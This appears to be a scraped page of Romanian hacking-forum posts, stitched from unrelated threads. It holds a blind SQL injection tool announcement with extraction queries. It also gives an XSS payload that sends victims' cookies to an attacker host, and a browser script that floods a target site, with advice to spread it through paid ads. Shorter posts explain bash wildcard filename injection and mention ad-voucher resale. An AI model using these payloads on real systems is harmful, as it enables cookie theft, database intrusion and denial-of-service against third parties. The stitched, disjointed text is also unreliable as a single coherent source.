Leaderboard

Am facut o versiune mai noua. Cea scrisa in visual basic nu prea mi-a placut asa ca m-am apucat de scris aplicatia in C++.Desigur nu mai are design ci vine sub forma de consola dar is mai multumit de el , datele extrase sunt mult mai exacte decat cele de pe versiunea scrisa in vb6. Am folosit libcurl pentru a realiza requesturile . Am adaugat %INJECT% pentru a indica lucul unde sa injecteze gen :site.com/index.php?parametruvulnerabil=1%INJECT%&dummy=2 Daca introduceti %CONTOR% intr-un limit , programul v-a incepe sa extraga date din limit pana v-a gasi un sir de lungime exemplu extragerea tabelelor : (select table_name from information_schema.tables limit %CONTOR%,1). Extragerea dateleor se vor duce intr-un fisier pe care il dati voi de la tastatura. Demo : Download : Zippyshare.com - Release.rar Sursa a fost compilata cu mingw din code blocks. Zippyshare.com - blind2.rar si aici: http://pastebin.com/pG2mafUv Multumesc lui @nedo pentru sfaturi si ajutorul oferit pentru repararea unor buguri , recomand sa urmariti blogul lui Florin's Blog de unde am invatat cum sta treaba cu threadurile in C++ si sa instalez cURL , si sa il sustineti poate mai posteaza si alte articole pe aceasta tema:D

M-am gandit la cum as putea exploata in alte moduri vulnerabilitatile de tip XSS in afara celor "clasice" de tipul: <script> new Image().src="http://siteulnostru.com/index.php?cookies="+encodeURI(document.cookie); </script> unde index.php ne trimite cookie-urile prin e-mail, spre exemplu. Vectorul XSS ar putea arata in felul urmator: <html> <body> <script> while(1) { var img = new Image(); var url = "http://www.victima.com/"; img.src = url; document.body.appendChild(img); } </script> </body> </html> Script-ul de mai sus va face request-uri in continuu, in fundal, atata timp cat victima se gaseste pe pagina respectiva. Am observat, folosind wireshark, ca numarul de request-uri este relativ redus(in medie 5-6 req/s). Se pare ca browsere-le limiteaza numarul de request-uri din motive de performanta. Am observat ca pentru protocolul ftp aceasta limita este mult mai ridicata(in medie 360-370 req/s). Putem modifica vectorul de mai sus in felul urmator: <html> <body> <script> while(1) { var img = new Image(); var url = "ftp://www.victima.com:80/"; img.src = url; document.body.appendChild(img); } </script> </body> </html> Request-urile vor fi redirectionate catre portul 80, deci requestul va fi de tip http in final. Am mai observat ca nu toate site-urile realizeaza acest redirect. Acum ne trebuie un numar cat mai mare de victime care sa viziteze pagina cu vectorul nostru. Avem, in principiu, doua metode: Fie avem un XSS pe un site cu un traffic ridicat(de ex. yahoo.com) Fie investim putin intr-un ad Prima optiune este relativ dificil de exploatat. A doua, insa, este mai accesibila. Putem apela chiar si la un ad provider contra cost: Clicksor Online Advertising Retargeting and Display Advertising | AdRoll Comparire su Kelkoo | Informazioni per shop online Latimea de banda consumata depinde de cat de mult suntem dispusi sa platim.

https://www.facebook.com/photo.php?v=681851048535636&set=vb.100001322425147&type=2&theater zii @aelius

E o parodie daca nu te-ai prins

=)))) +1 unban ,dac? prime?ti

Wildcard Expansion When you type a command with a "*" in bash, bash expands it to the list of all files in the directory and passes them all as arguments to the program. For example, "rm *", will remove files in the current directory. Filenames Misinterpreted as Switches Most command line programs can take switches that affect how they work. For example, the ls command, when ran without any switches, looks like the output below. [stephen@superX foo]$ ls asdf.txt foobar -l Now let's say you want to know what group and user owns these files. You can pass "-l" to the ls program to figure that out, which looks like this: [stephen@superX foo]$ ls -l total 0 -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 -l Notice there is a file named -l in our directory. Let's try "ls *" now and see what happens: [stephen@superX foo]$ ls * -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar The last two outputs are similar, but the output of "ls *" is different. It is missing the "-l" file, which was interpreted by ls as the "-l" switch. There's no way for the ls program to tell that the "-l" came from the wildcard expansion and wasn't actually what we in intended. It's equivalent to running: [stephen@superX foo]$ ls asdf.txt foobar.txt -l -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar Security Problems Misinterpreted filenames can lead to problems when someone runs a wildcard expansion on a folder they download from the Internet, for example, without first checking the filenames. Could this be used to attack someone's computer? Can we make a program do something bad by having specially-named files in the directory? Yes, it turns out that we can. Aici : https://dicesoft.net/projects/wildcard-code-execution-exploit.htm

puteai sa specifici si : General Voucher Terms: 1. Vouchers are for new Ads Accounts only. 2. Only one voucher can be used per account. 3. It requires a Credit Card/Paypal account for activation. 4. Vouchers are guaranteed against invalid/expired codes. But the guarantee does not apply if you redeemed the coupon and any ads or account related issues occur. Unfortunately, I have no control as those things are the billing details related, not by voucher. Asa mi-a explicat mie un american cand am vrut sa cumpar de la el si am renuntat dupa ce mia zis ca nu pot folosi codul pe romania deci fii si tu mai detaliat